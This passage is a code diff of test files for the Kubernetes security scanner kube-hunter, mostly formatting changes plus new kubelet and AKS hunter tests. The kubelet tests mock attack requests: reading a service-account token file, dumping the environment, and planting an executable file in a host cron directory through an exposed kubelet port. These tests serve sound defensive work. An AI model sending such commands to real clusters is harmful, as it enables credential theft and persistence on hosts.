def test_setup_logger_none():
|
||||
setup_logger("NONE")
|
||||
setup_logger("NONE", None)
|
||||
assert logging.getLogger().manager.disable == logging.CRITICAL
|
||||
|
||||
@@ -8,7 +8,7 @@ set_config(Config())
|
||||
|
||||
|
||||
def test_presetcloud():
|
||||
""" Testing if it doesn't try to run get_cloud if the cloud type is already set.
|
||||
"""Testing if it doesn't try to run get_cloud if the cloud type is already set.
|
||||
get_cloud(1.2.3.4) will result with an error
|
||||
"""
|
||||
expcted = "AWS"
|
||||
|
||||
@@ -28,11 +28,13 @@ from kube_hunter.modules.hunting.dashboard import KubeDashboard
|
||||
from kube_hunter.modules.hunting.dns import DnsSpoofHunter
|
||||
from kube_hunter.modules.hunting.etcd import EtcdRemoteAccess, EtcdRemoteAccessActive
|
||||
from kube_hunter.modules.hunting.kubelet import (
|
||||
ProveAnonymousAuth,
|
||||
MaliciousIntentViaSecureKubeletPort,
|
||||
ProveContainerLogsHandler,
|
||||
ProveRunHandler,
|
||||
ProveSystemLogs,
|
||||
ReadOnlyKubeletPortHunter,
|
||||
SecureKubeletPortHunter,
|
||||
ProveRunHandler,
|
||||
ProveContainerLogsHandler,
|
||||
ProveSystemLogs,
|
||||
)
|
||||
from kube_hunter.modules.hunting.mounts import VarLogMountHunter, ProveVarLogMount
|
||||
from kube_hunter.modules.hunting.proxy import KubeProxy, ProveProxyExposed, K8sVersionDisclosureProve
|
||||
@@ -77,6 +79,8 @@ ACTIVE_HUNTERS = {
|
||||
ProveVarLogMount,
|
||||
ProveProxyExposed,
|
||||
K8sVersionDisclosureProve,
|
||||
ProveAnonymousAuth,
|
||||
MaliciousIntentViaSecureKubeletPort,
|
||||
}
|
||||
|
||||
|
||||
|
||||
@@ -20,7 +20,9 @@ def test_ApiServer():
|
||||
m.get("https://mockOther:443", text="elephant")
|
||||
m.get("https://mockKubernetes:443", text='{"code":403}', status_code=403)
|
||||
m.get(
|
||||
"https://mockKubernetes:443/version", text='{"major": "1.14.10"}', status_code=200,
|
||||
"https://mockKubernetes:443/version",
|
||||
text='{"major": "1.14.10"}',
|
||||
status_code=200,
|
||||
)
|
||||
|
||||
e = Event()
|
||||
@@ -44,11 +46,15 @@ def test_ApiServerWithServiceAccountToken():
|
||||
counter = 0
|
||||
with requests_mock.Mocker() as m:
|
||||
m.get(
|
||||
"https://mockKubernetes:443", request_headers={"Authorization": "Bearer very_secret"}, text='{"code":200}',
|
||||
"https://mockKubernetes:443",
|
||||
request_headers={"Authorization": "Bearer very_secret"},
|
||||
text='{"code":200}',
|
||||
)
|
||||
m.get("https://mockKubernetes:443", text='{"code":403}', status_code=403)
|
||||
m.get(
|
||||
"https://mockKubernetes:443/version", text='{"major": "1.14.10"}', status_code=200,
|
||||
"https://mockKubernetes:443/version",
|
||||
text='{"major": "1.14.10"}',
|
||||
status_code=200,
|
||||
)
|
||||
m.get("https://mockOther:443", text="elephant")
|
||||
|
||||
@@ -117,7 +123,7 @@ def test_InsecureApiServer():
|
||||
|
||||
# We should only generate an ApiServer event for a response that looks like it came from a Kubernetes node
|
||||
@handler.subscribe(ApiServer)
|
||||
class testApiServer(object):
|
||||
class testApiServer:
|
||||
def __init__(self, event):
|
||||
print("Event")
|
||||
assert event.host == "mockKubernetes"
|
||||
|
||||
@@ -90,7 +90,7 @@ class TestDiscoveryUtils:
|
||||
def test_generate_hosts_valid_ignore():
|
||||
remove = IPAddress("192.168.1.8")
|
||||
scan = "192.168.1.0/24"
|
||||
expected = set(ip for ip in IPNetwork(scan) if ip != remove)
|
||||
expected = {ip for ip in IPNetwork(scan) if ip != remove}
|
||||
|
||||
actual = set(HostDiscoveryHelpers.generate_hosts([scan, f"!{str(remove)}"]))
|
||||
|
||||
|
||||
49
tests/hunting/test_aks.py
Normal file
49
tests/hunting/test_aks.py
Normal file
@@ -0,0 +1,49 @@
|
||||
# flake8: noqa: E402
|
||||
import requests_mock
|
||||
|
||||
from kube_hunter.conf import Config, set_config
|
||||
|
||||
import json
|
||||
|
||||
set_config(Config())
|
||||
|
||||
from kube_hunter.modules.hunting.kubelet import ExposedPodsHandler
|
||||
from kube_hunter.modules.hunting.aks import AzureSpnHunter
|
||||
|
||||
|
||||
def test_AzureSpnHunter():
|
||||
e = ExposedPodsHandler(pods=[])
|
||||
pod_template = '{{"items":[ {{"apiVersion":"v1","kind":"Pod","metadata":{{"name":"etc","namespace":"default"}},"spec":{{"containers":[{{"command":["sleep","99999"],"image":"ubuntu","name":"test","volumeMounts":[{{"mountPath":"/mp","name":"v"}}]}}],"volumes":[{{"hostPath":{{"path":"{}"}},"name":"v"}}]}}}} ]}}'
|
||||
|
||||
bad_paths = ["/", "/etc", "/etc/", "/etc/kubernetes", "/etc/kubernetes/azure.json"]
|
||||
good_paths = ["/yo", "/etc/yo", "/etc/kubernetes/yo.json"]
|
||||
|
||||
for p in bad_paths:
|
||||
e.pods = json.loads(pod_template.format(p))["items"]
|
||||
h = AzureSpnHunter(e)
|
||||
c = h.get_key_container()
|
||||
assert c
|
||||
|
||||
for p in good_paths:
|
||||
e.pods = json.loads(pod_template.format(p))["items"]
|
||||
h = AzureSpnHunter(e)
|
||||
c = h.get_key_container()
|
||||
assert c == None
|
||||
|
||||
pod_no_volume_mounts = '{"items":[ {"apiVersion":"v1","kind":"Pod","metadata":{"name":"etc","namespace":"default"},"spec":{"containers":[{"command":["sleep","99999"],"image":"ubuntu","name":"test"}],"volumes":[{"hostPath":{"path":"/whatever"},"name":"v"}]}} ]}'
|
||||
e.pods = json.loads(pod_no_volume_mounts)["items"]
|
||||
h = AzureSpnHunter(e)
|
||||
c = h.get_key_container()
|
||||
assert c == None
|
||||
|
||||
pod_no_volumes = '{"items":[ {"apiVersion":"v1","kind":"Pod","metadata":{"name":"etc","namespace":"default"},"spec":{"containers":[{"command":["sleep","99999"],"image":"ubuntu","name":"test"}]}} ]}'
|
||||
e.pods = json.loads(pod_no_volumes)["items"]
|
||||
h = AzureSpnHunter(e)
|
||||
c = h.get_key_container()
|
||||
assert c == None
|
||||
|
||||
pod_other_volume = '{"items":[ {"apiVersion":"v1","kind":"Pod","metadata":{"name":"etc","namespace":"default"},"spec":{"containers":[{"command":["sleep","99999"],"image":"ubuntu","name":"test","volumeMounts":[{"mountPath":"/mp","name":"v"}]}],"volumes":[{"emptyDir":{},"name":"v"}]}} ]}'
|
||||
e.pods = json.loads(pod_other_volume)["items"]
|
||||
h = AzureSpnHunter(e)
|
||||
c = h.get_key_container()
|
||||
assert c == None
|
||||
@@ -56,7 +56,8 @@ def test_AccessApiServer():
|
||||
with requests_mock.Mocker() as m:
|
||||
m.get("https://mockKubernetes:443/api", text="{}")
|
||||
m.get(
|
||||
"https://mockKubernetes:443/api/v1/namespaces", text='{"items":[{"metadata":{"name":"hello"}}]}',
|
||||
"https://mockKubernetes:443/api/v1/namespaces",
|
||||
text='{"items":[{"metadata":{"name":"hello"}}]}',
|
||||
)
|
||||
m.get(
|
||||
"https://mockKubernetes:443/api/v1/pods",
|
||||
@@ -64,10 +65,12 @@ def test_AccessApiServer():
|
||||
{"metadata":{"name":"podB", "namespace":"namespaceB"}}]}',
|
||||
)
|
||||
m.get(
|
||||
"https://mockkubernetes:443/apis/rbac.authorization.k8s.io/v1/roles", status_code=403,
|
||||
"https://mockkubernetes:443/apis/rbac.authorization.k8s.io/v1/roles",
|
||||
status_code=403,
|
||||
)
|
||||
m.get(
|
||||
"https://mockkubernetes:443/apis/rbac.authorization.k8s.io/v1/clusterroles", text='{"items":[]}',
|
||||
"https://mockkubernetes:443/apis/rbac.authorization.k8s.io/v1/clusterroles",
|
||||
text='{"items":[]}',
|
||||
)
|
||||
m.get(
|
||||
"https://mockkubernetes:443/version",
|
||||
@@ -91,7 +94,8 @@ def test_AccessApiServer():
|
||||
# TODO check that these responses reflect what Kubernetes does
|
||||
m.get("https://mocktoken:443/api", text="{}")
|
||||
m.get(
|
||||
"https://mocktoken:443/api/v1/namespaces", text='{"items":[{"metadata":{"name":"hello"}}]}',
|
||||
"https://mocktoken:443/api/v1/namespaces",
|
||||
text='{"items":[{"metadata":{"name":"hello"}}]}',
|
||||
)
|
||||
m.get(
|
||||
"https://mocktoken:443/api/v1/pods",
|
||||
@@ -99,7 +103,8 @@ def test_AccessApiServer():
|
||||
{"metadata":{"name":"podB", "namespace":"namespaceB"}}]}',
|
||||
)
|
||||
m.get(
|
||||
"https://mocktoken:443/apis/rbac.authorization.k8s.io/v1/roles", status_code=403,
|
||||
"https://mocktoken:443/apis/rbac.authorization.k8s.io/v1/roles",
|
||||
status_code=403,
|
||||
)
|
||||
m.get(
|
||||
"https://mocktoken:443/apis/rbac.authorization.k8s.io/v1/clusterroles",
|
||||
@@ -117,7 +122,7 @@ def test_AccessApiServer():
|
||||
|
||||
|
||||
@handler.subscribe(ListNamespaces)
|
||||
class test_ListNamespaces(object):
|
||||
class test_ListNamespaces:
|
||||
def __init__(self, event):
|
||||
print("ListNamespaces")
|
||||
assert event.evidence == ["hello"]
|
||||
@@ -130,7 +135,7 @@ class test_ListNamespaces(object):
|
||||
|
||||
|
||||
@handler.subscribe(ListPodsAndNamespaces)
|
||||
class test_ListPodsAndNamespaces(object):
|
||||
class test_ListPodsAndNamespaces:
|
||||
def __init__(self, event):
|
||||
print("ListPodsAndNamespaces")
|
||||
assert len(event.evidence) == 2
|
||||
@@ -153,7 +158,7 @@ class test_ListPodsAndNamespaces(object):
|
||||
|
||||
# Should never see this because the API call in the test returns 403 status code
|
||||
@handler.subscribe(ListRoles)
|
||||
class test_ListRoles(object):
|
||||
class test_ListRoles:
|
||||
def __init__(self, event):
|
||||
print("ListRoles")
|
||||
assert 0
|
||||
@@ -164,7 +169,7 @@ class test_ListRoles(object):
|
||||
# Should only see this when we have a token because the API call returns an empty list of items
|
||||
# in the test where we have no token
|
||||
@handler.subscribe(ListClusterRoles)
|
||||
class test_ListClusterRoles(object):
|
||||
class test_ListClusterRoles:
|
||||
def __init__(self, event):
|
||||
print("ListClusterRoles")
|
||||
assert event.auth_token == "so-secret"
|
||||
@@ -173,7 +178,7 @@ class test_ListClusterRoles(object):
|
||||
|
||||
|
||||
@handler.subscribe(ServerApiAccess)
|
||||
class test_ServerApiAccess(object):
|
||||
class test_ServerApiAccess:
|
||||
def __init__(self, event):
|
||||
print("ServerApiAccess")
|
||||
if event.category == UnauthenticatedAccess:
|
||||
@@ -186,7 +191,7 @@ class test_ServerApiAccess(object):
|
||||
|
||||
|
||||
@handler.subscribe(ApiServerPassiveHunterFinished)
|
||||
class test_PassiveHunterFinished(object):
|
||||
class test_PassiveHunterFinished:
|
||||
def __init__(self, event):
|
||||
print("PassiveHunterFinished")
|
||||
assert event.namespaces == ["hello"]
|
||||
@@ -228,10 +233,12 @@ def test_AccessApiServerActive():
|
||||
)
|
||||
m.post("https://mockKubernetes:443/api/v1/clusterroles", text="{}")
|
||||
m.post(
|
||||
"https://mockkubernetes:443/apis/rbac.authorization.k8s.io/v1/clusterroles", text="{}",
|
||||
"https://mockkubernetes:443/apis/rbac.authorization.k8s.io/v1/clusterroles",
|
||||
text="{}",
|
||||
)
|
||||
m.post(
|
||||
"https://mockkubernetes:443/api/v1/namespaces/hello-namespace/pods", text="{}",
|
||||
"https://mockkubernetes:443/api/v1/namespaces/hello-namespace/pods",
|
||||
text="{}",
|
||||
)
|
||||
m.post(
|
||||
"https://mockkubernetes:443" "/apis/rbac.authorization.k8s.io/v1/namespaces/hello-namespace/roles",
|
||||
@@ -269,12 +276,12 @@ def test_AccessApiServerActive():
|
||||
|
||||
|
||||
@handler.subscribe(CreateANamespace)
|
||||
class test_CreateANamespace(object):
|
||||
class test_CreateANamespace:
|
||||
def __init__(self, event):
|
||||
assert "abcde" in event.evidence
|
||||
|
||||
|
||||
@handler.subscribe(DeleteANamespace)
|
||||
class test_DeleteANamespace(object):
|
||||
class test_DeleteANamespace:
|
||||
def __init__(self, event):
|
||||
assert "2019-02-26" in event.evidence
|
||||
|
||||
@@ -37,6 +37,6 @@ rceJuGsnJEQ=
|
||||
|
||||
|
||||
@handler.subscribe(CertificateEmail)
|
||||
class test_CertificateEmail(object):
|
||||
class test_CertificateEmail:
|
||||
def __init__(self, event):
|
||||
assert event.email == b"build@nodejs.org0"
|
||||
|
||||
@@ -41,7 +41,7 @@ def test_K8sCveHunter():
|
||||
|
||||
|
||||
@handler.subscribe(ServerApiVersionEndPointAccessPE)
|
||||
class test_CVE_2018_1002105(object):
|
||||
class test_CVE_2018_1002105:
|
||||
def __init__(self, event):
|
||||
global cve_counter
|
||||
cve_counter += 1
|
||||
|
||||
721
tests/hunting/test_kubelet.py
Normal file
721
tests/hunting/test_kubelet.py
Normal file
@@ -0,0 +1,721 @@
|
||||
import requests
|
||||
import requests_mock
|
||||
import urllib.parse
|
||||
import uuid
|
||||
|
||||
from kube_hunter.core.events import handler
|
||||
from kube_hunter.modules.hunting.kubelet import (
|
||||
AnonymousAuthEnabled,
|
||||
ExposedExistingPrivilegedContainersViaSecureKubeletPort,
|
||||
ProveAnonymousAuth,
|
||||
MaliciousIntentViaSecureKubeletPort,
|
||||
)
|
||||
|
||||
counter = 0
|
||||
pod_list_with_privileged_container = """{
|
||||
"kind": "PodList",
|
||||
"apiVersion": "v1",
|
||||
"metadata": {},
|
||||
"items": [
|
||||
{
|
||||
"metadata": {
|
||||
"name": "kube-hunter-privileged-deployment-86dc79f945-sjjps",
|
||||
"namespace": "kube-hunter-privileged"
|
||||
},
|
||||
"spec": {
|
||||
"containers": [
|
||||
{
|
||||
"name": "ubuntu",
|
||||
"securityContext": {
|
||||
{security_context_definition_to_test}
|
||||
}
|
||||
}
|
||||
]
|
||||
}
|
||||
}
|
||||
]
|
||||
}
|
||||
"""
|
||||
service_account_token = "eyJhbGciOiJSUzI1NiIsImtpZCI6IlR0YmxoMXh..."
|
||||
env = """PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
|
||||
HOSTNAME=kube-hunter-privileged-deployment-86dc79f945-sjjps
|
||||
KUBERNETES_SERVICE_PORT=443
|
||||
KUBERNETES_SERVICE_PORT_HTTPS=443
|
||||
KUBERNETES_PORT=tcp://10.96.0.1:443
|
||||
KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443
|
||||
KUBERNETES_PORT_443_TCP_PROTO=tcp
|
||||
KUBERNETES_PORT_443_TCP_PORT=443
|
||||
KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1
|
||||
KUBERNETES_SERVICE_HOST=10.96.0.1
|
||||
HOME=/root"""
|
||||
exposed_privileged_containers = [
|
||||
{
|
||||
"container_name": "ubuntu",
|
||||
"environment_variables": env,
|
||||
"pod_id": "kube-hunter-privileged-deployment-86dc79f945-sjjps",
|
||||
"pod_namespace": "kube-hunter-privileged",
|
||||
"service_account_token": service_account_token,
|
||||
}
|
||||
]
|
||||
cat_proc_cmdline = "BOOT_IMAGE=/boot/bzImage root=LABEL=Mock loglevel=3 console=ttyS0"
|
||||
number_of_rm_attempts = 1
|
||||
number_of_umount_attempts = 1
|
||||
number_of_rmdir_attempts = 1
|
||||
|
||||
|
||||
def create_test_event_type_one():
|
||||
anonymous_auth_enabled_event = AnonymousAuthEnabled()
|
||||
|
||||
anonymous_auth_enabled_event.host = "localhost"
|
||||
anonymous_auth_enabled_event.session = requests.Session()
|
||||
|
||||
return anonymous_auth_enabled_event
|
||||
|
||||
|
||||
def create_test_event_type_two():
|
||||
exposed_existing_privileged_containers_via_secure_kubelet_port_event = (
|
||||
ExposedExistingPrivilegedContainersViaSecureKubeletPort(exposed_privileged_containers)
|
||||
)
|
||||
exposed_existing_privileged_containers_via_secure_kubelet_port_event.host = "localhost"
|
||||
exposed_existing_privileged_containers_via_secure_kubelet_port_event.session = requests.Session()
|
||||
|
||||
return exposed_existing_privileged_containers_via_secure_kubelet_port_event
|
||||
|
||||
|
||||
def test_get_request_valid_url():
|
||||
class_being_tested = ProveAnonymousAuth(create_test_event_type_one())
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://localhost:10250/mock"
|
||||
|
||||
session_mock.get(url, text="mock")
|
||||
|
||||
return_value = class_being_tested.get_request(url)
|
||||
|
||||
assert return_value == "mock"
|
||||
|
||||
|
||||
def test_get_request_invalid_url():
|
||||
class_being_tested = ProveAnonymousAuth(create_test_event_type_one())
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://localhost:10250/[mock]"
|
||||
|
||||
session_mock.get(url, exc=requests.exceptions.InvalidURL)
|
||||
|
||||
return_value = class_being_tested.get_request(url)
|
||||
|
||||
assert return_value.startswith("Exception: ")
|
||||
|
||||
|
||||
def post_request(url, params, expected_return_value, exception=None):
|
||||
class_being_tested_one = ProveAnonymousAuth(create_test_event_type_one())
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested_one.event.session) as session_mock:
|
||||
mock_params = {"text": "mock"} if not exception else {"exc": exception}
|
||||
session_mock.post(url, **mock_params)
|
||||
|
||||
return_value = class_being_tested_one.post_request(url, params)
|
||||
|
||||
assert return_value == expected_return_value
|
||||
|
||||
class_being_tested_two = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two())
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested_two.event.session) as session_mock:
|
||||
mock_params = {"text": "mock"} if not exception else {"exc": exception}
|
||||
session_mock.post(url, **mock_params)
|
||||
|
||||
return_value = class_being_tested_two.post_request(url, params)
|
||||
|
||||
assert return_value == expected_return_value
|
||||
|
||||
|
||||
def test_post_request_valid_url_with_parameters():
|
||||
url = "https://localhost:10250/mock?cmd=ls"
|
||||
params = {"cmd": "ls"}
|
||||
post_request(url, params, expected_return_value="mock")
|
||||
|
||||
|
||||
def test_post_request_valid_url_without_parameters():
|
||||
url = "https://localhost:10250/mock"
|
||||
params = {}
|
||||
post_request(url, params, expected_return_value="mock")
|
||||
|
||||
|
||||
def test_post_request_invalid_url_with_parameters():
|
||||
url = "https://localhost:10250/mock?cmd=ls"
|
||||
params = {"cmd": "ls"}
|
||||
post_request(url, params, expected_return_value="Exception: ", exception=requests.exceptions.InvalidURL)
|
||||
|
||||
|
||||
def test_post_request_invalid_url_without_parameters():
|
||||
url = "https://localhost:10250/mock"
|
||||
params = {}
|
||||
post_request(url, params, expected_return_value="Exception: ", exception=requests.exceptions.InvalidURL)
|
||||
|
||||
|
||||
def test_has_no_exception_result_with_exception():
|
||||
mock_result = "Exception: Mock."
|
||||
|
||||
return_value = ProveAnonymousAuth.has_no_exception(mock_result)
|
||||
|
||||
assert return_value is False
|
||||
|
||||
|
||||
def test_has_no_exception_result_without_exception():
|
||||
mock_result = "Mock."
|
||||
|
||||
return_value = ProveAnonymousAuth.has_no_exception(mock_result)
|
||||
|
||||
assert return_value is True
|
||||
|
||||
|
||||
def test_has_no_error_result_with_error():
|
||||
mock_result = "Mock exited with error."
|
||||
|
||||
return_value = ProveAnonymousAuth.has_no_error(mock_result)
|
||||
|
||||
assert return_value is False
|
||||
|
||||
|
||||
def test_has_no_error_result_without_error():
|
||||
mock_result = "Mock."
|
||||
|
||||
return_value = ProveAnonymousAuth.has_no_error(mock_result)
|
||||
|
||||
assert return_value is True
|
||||
|
||||
|
||||
def test_has_no_error_nor_exception_result_without_exception_and_without_error():
|
||||
mock_result = "Mock."
|
||||
|
||||
return_value = ProveAnonymousAuth.has_no_error_nor_exception(mock_result)
|
||||
|
||||
assert return_value is True
|
||||
|
||||
|
||||
def test_has_no_error_nor_exception_result_with_exception_and_without_error():
|
||||
mock_result = "Exception: Mock."
|
||||
|
||||
return_value = ProveAnonymousAuth.has_no_error_nor_exception(mock_result)
|
||||
|
||||
assert return_value is False
|
||||
|
||||
|
||||
def test_has_no_error_nor_exception_result_without_exception_and_with_error():
|
||||
mock_result = "Mock exited with error."
|
||||
|
||||
return_value = ProveAnonymousAuth.has_no_error_nor_exception(mock_result)
|
||||
|
||||
assert return_value is False
|
||||
|
||||
|
||||
def test_has_no_error_nor_exception_result_with_exception_and_with_error():
|
||||
mock_result = "Exception: Mock. Mock exited with error."
|
||||
|
||||
return_value = ProveAnonymousAuth.has_no_error_nor_exception(mock_result)
|
||||
|
||||
assert return_value is False
|
||||
|
||||
|
||||
def proveanonymousauth_success(anonymous_auth_enabled_event, security_context_definition_to_test):
|
||||
global counter
|
||||
counter = 0
|
||||
|
||||
with requests_mock.Mocker(session=anonymous_auth_enabled_event.session) as session_mock:
|
||||
url = "https://" + anonymous_auth_enabled_event.host + ":10250/"
|
||||
listing_pods_url = url + "pods"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
|
||||
session_mock.get(
|
||||
listing_pods_url,
|
||||
text=pod_list_with_privileged_container.replace(
|
||||
"{security_context_definition_to_test}", security_context_definition_to_test
|
||||
),
|
||||
)
|
||||
session_mock.post(
|
||||
run_url + urllib.parse.quote("cat /var/run/secrets/kubernetes.io/serviceaccount/token", safe=""),
|
||||
text=service_account_token,
|
||||
)
|
||||
session_mock.post(run_url + "env", text=env)
|
||||
|
||||
class_being_tested = ProveAnonymousAuth(anonymous_auth_enabled_event)
|
||||
class_being_tested.execute()
|
||||
|
||||
assert "The following containers have been successfully breached." in class_being_tested.event.evidence
|
||||
|
||||
assert counter == 1
|
||||
|
||||
|
||||
def test_proveanonymousauth_success_with_privileged_container_via_privileged_setting():
|
||||
proveanonymousauth_success(create_test_event_type_one(), '"privileged": true')
|
||||
|
||||
|
||||
def test_proveanonymousauth_success_with_privileged_container_via_capabilities():
|
||||
proveanonymousauth_success(create_test_event_type_one(), '"capabilities": { "add": ["SYS_ADMIN"] }')
|
||||
|
||||
|
||||
def test_proveanonymousauth_connectivity_issues():
|
||||
class_being_tested = ProveAnonymousAuth(create_test_event_type_one())
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://" + class_being_tested.event.host + ":10250/"
|
||||
listing_pods_url = url + "pods"
|
||||
|
||||
session_mock.get(listing_pods_url, exc=requests.exceptions.ConnectionError)
|
||||
|
||||
class_being_tested.execute()
|
||||
|
||||
assert class_being_tested.event.evidence == ""
|
||||
|
||||
|
||||
@handler.subscribe(ExposedExistingPrivilegedContainersViaSecureKubeletPort)
|
||||
class ExposedPrivilegedContainersViaAnonymousAuthEnabledInSecureKubeletPortEventCounter:
|
||||
def __init__(self, event):
|
||||
global counter
|
||||
counter += 1
|
||||
|
||||
|
||||
def test_check_file_exists_existing_file():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://localhost:10250/"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
session_mock.post(run_url + urllib.parse.quote("ls mock.txt", safe=""), text="mock.txt")
|
||||
|
||||
return_value = class_being_tested.check_file_exists(
|
||||
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", "mock.txt"
|
||||
)
|
||||
|
||||
assert return_value is True
|
||||
|
||||
|
||||
def test_check_file_exists_non_existent_file():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://localhost:10250/"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
session_mock.post(
|
||||
run_url + urllib.parse.quote("ls nonexistentmock.txt", safe=""),
|
||||
text="ls: nonexistentmock.txt: No such file or directory",
|
||||
)
|
||||
|
||||
return_value = class_being_tested.check_file_exists(
|
||||
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
|
||||
"nonexistentmock.txt",
|
||||
)
|
||||
|
||||
assert return_value is False
|
||||
|
||||
|
||||
rm_command_removed_successfully_callback_counter = 0
|
||||
|
||||
|
||||
def rm_command_removed_successfully_callback(request, context):
|
||||
global rm_command_removed_successfully_callback_counter
|
||||
|
||||
if rm_command_removed_successfully_callback_counter == 0:
|
||||
rm_command_removed_successfully_callback_counter += 1
|
||||
return "mock.txt"
|
||||
else:
|
||||
return "ls: mock.txt: No such file or directory"
|
||||
|
||||
|
||||
def test_rm_command_removed_successfully():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://localhost:10250/"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
session_mock.post(
|
||||
run_url + urllib.parse.quote("ls mock.txt", safe=""), text=rm_command_removed_successfully_callback
|
||||
)
|
||||
session_mock.post(run_url + urllib.parse.quote("rm -f mock.txt", safe=""), text="")
|
||||
|
||||
return_value = class_being_tested.rm_command(
|
||||
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
|
||||
"mock.txt",
|
||||
number_of_rm_attempts=1,
|
||||
seconds_to_wait_for_os_command=None,
|
||||
)
|
||||
|
||||
assert return_value is True
|
||||
|
||||
|
||||
def test_rm_command_removed_failed():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://localhost:10250/"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
session_mock.post(run_url + urllib.parse.quote("ls mock.txt", safe=""), text="mock.txt")
|
||||
session_mock.post(run_url + urllib.parse.quote("rm -f mock.txt", safe=""), text="Permission denied")
|
||||
|
||||
return_value = class_being_tested.rm_command(
|
||||
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
|
||||
"mock.txt",
|
||||
number_of_rm_attempts=1,
|
||||
seconds_to_wait_for_os_command=None,
|
||||
)
|
||||
|
||||
assert return_value is False
|
||||
|
||||
|
||||
def test_attack_exposed_existing_privileged_container_success():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
url = "https://localhost:10250/"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
directory_created = "/kube-hunter-mock_" + str(uuid.uuid1())
|
||||
file_name = "kube-hunter-mock" + str(uuid.uuid1())
|
||||
file_name_with_path = f"{directory_created}/etc/cron.daily/{file_name}"
|
||||
|
||||
session_mock.post(run_url + urllib.parse.quote(f"touch {file_name_with_path}", safe=""), text="")
|
||||
session_mock.post(
|
||||
run_url + urllib.parse.quote("chmod {} {}".format("755", file_name_with_path), safe=""), text=""
|
||||
)
|
||||
|
||||
return_value = class_being_tested.attack_exposed_existing_privileged_container(
|
||||
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
|
||||
directory_created,
|
||||
number_of_rm_attempts,
|
||||
None,
|
||||
file_name,
|
||||
)
|
||||
|
||||
assert return_value["result"] is True
|
||||
|
||||
|
||||
def test_attack_exposed_existing_privileged_container_failure_when_touch():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
directory_created = "/kube-hunter-mock_" + str(uuid.uuid1())
|
||||
file_name = "kube-hunter-mock" + str(uuid.uuid1())
|
||||
file_name_with_path = f"{directory_created}/etc/cron.daily/{file_name}"
|
||||
|
||||
url = "https://localhost:10250/"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
session_mock.post(
|
||||
run_url + urllib.parse.quote(f"touch {file_name_with_path}", safe=""),
|
||||
text="Operation not permitted",
|
||||
)
|
||||
|
||||
return_value = class_being_tested.attack_exposed_existing_privileged_container(
|
||||
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
|
||||
directory_created,
|
||||
None,
|
||||
file_name,
|
||||
)
|
||||
|
||||
assert return_value["result"] is False
|
||||
|
||||
|
||||
def test_attack_exposed_existing_privileged_container_failure_when_chmod():
|
||||
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
|
||||
|
||||
with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
|
||||
directory_created = "/kube-hunter-mock_" + str(uuid.uuid1())
|
||||
file_name = "kube-hunter-mock" + str(uuid.uuid1())
|
||||
file_name_with_path = f"{directory_created}/etc/cron.daily/{file_name}"
|
||||
|
||||
url = "https://localhost:10250/"
|
||||
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
|
||||
session_mock.post(run_url + urllib.parse.quote(f"touch {file_name_with_path}", safe=""), text="")
|
||||
session_mock.post(
|
||||
run_url + urllib.parse.quote("chmod {} {}".format("755", file_name_with_path), safe=""),
|
||||
text="Permission denied",
|
||||
)
|
||||
|
||||
return_value = class_being_tested.attack_exposed_existing_privileged_container(
|
||||
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
|
||||
directory_created,
|
||||
None,
